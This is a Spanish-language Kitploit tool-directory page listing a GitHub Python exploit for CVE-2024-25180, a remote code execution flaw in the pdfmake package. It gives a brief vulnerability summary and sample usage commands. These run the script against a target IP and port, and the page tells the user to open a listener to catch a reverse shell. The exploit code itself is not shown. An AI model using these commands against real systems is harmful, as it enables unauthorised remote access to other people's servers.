Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-25180 — Script de exploit en Python para CVE-2024-25180, una vulnerabilidad de ejecución remota de código en pdfmake, que entrega una shell inversa mediante peticiones POST manipuladas. | Kitploit
Herramientas/GitHubGitHub/dustblessnotdust/cve-2024-25180
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebComando y ControlHerramienta de Acceso Remoto
GitHubdustblessnotdust/cve-2024-25180

CVE-2024-25180

Script de exploit en Python para CVE-2024-25180, una vulnerabilidad de ejecución remota de código en pdfmake, que entrega una shell inversa mediante peticiones POST manipuladas.

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-25180

Resumen

pdfmake es un paquete de impresión PDF puro de JavaScript del lado del cliente/servidor. La versión afectada de este paquete es vulnerable a la inyección de código arbitrario, permitiendo a un atacante ejecutar código arbitrario enviando una solicitud POST diseñada a la ruta /pdf. Los atacantes pueden ejecutar código arbitrario en el sistema enviando una solicitud diseñada.

CVE-2024-25180 Remote Code Execution in pdfmake

Uso del script

root@kitploit:~
python3 CVE-2024-25180.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>

python3 CVE-2024-25180.py 192.168.140.42 1234 192.168.45.208 80

Escucha en el puerto 80 para obtener una shell inversa

image

Descargar herramienta